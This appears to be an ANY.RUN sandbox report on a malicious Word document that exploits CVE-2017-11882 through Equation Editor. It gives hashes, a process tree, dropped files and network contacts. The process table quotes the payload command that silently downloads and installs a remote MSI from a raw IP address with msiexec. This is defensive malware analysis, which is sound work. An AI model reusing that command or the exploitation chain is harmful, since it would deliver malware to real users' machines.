analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PDA-Woo Choon_Tanker.doc

Full analysis: https://app.any.run/tasks/070a5162-287f-43eb-a5e1-91a5e8ac2a2c
Verdict: Malicious activity
Analysis date: November 15, 2018, 08:46:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

2B1CAD8F874874748C924B9057DD28C5

SHA1:

D91A0830CC5C808F77541BD01172647CDA2E5B33

SHA256:

92B3D0BE6F0EC8124CEF6F2753285E3E9241EDF0451B1E2FF9E839FE6EB2D3A8

SSDEEP:

768:QmKfcZpEHUqUisx+NLBa6fI0mqEN5mtkezbNqzqO2nTECsi6G7VtkPL9oQ28Vb/W:Q4ZcUisxYtHlZd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2104)

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3196)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3196)

  • INFO

    • Application was crashed

      • EQNEDT32.EXE (PID: 3196)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3220)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3220)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3220"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PDA-Woo Choon_Tanker.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3196"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2104cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/44.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1619
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2752msiexec.exe /i http://34.244.180.39/44.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1619
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3832C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2056"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 431
Read events
777
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
3220WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8C08.tmp.cvr
MD5:
SHA256:
3220WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$A-Woo Choon_Tanker.docpgc
MD5:51D07EC59085F2070A3A3623E3383876
SHA256:70F6DB8963DCA48719E41EFE1CD73DC09D3CF401AE238F429E81045C9D28E0AD
3220WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:70C278D8BB09C3041479A9BC2AF4E1A9
SHA256:D69E23B5D0FBBBEA2B15D68BAE73B8D21CB5A54E7F9352E099020E7F51DABA60
3220WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lextext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3832
msiexec.exe
34.244.180.39:80
Amazon.com, Inc.
IE
suspicious

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
PDA-Woo Choon_Tanker.doc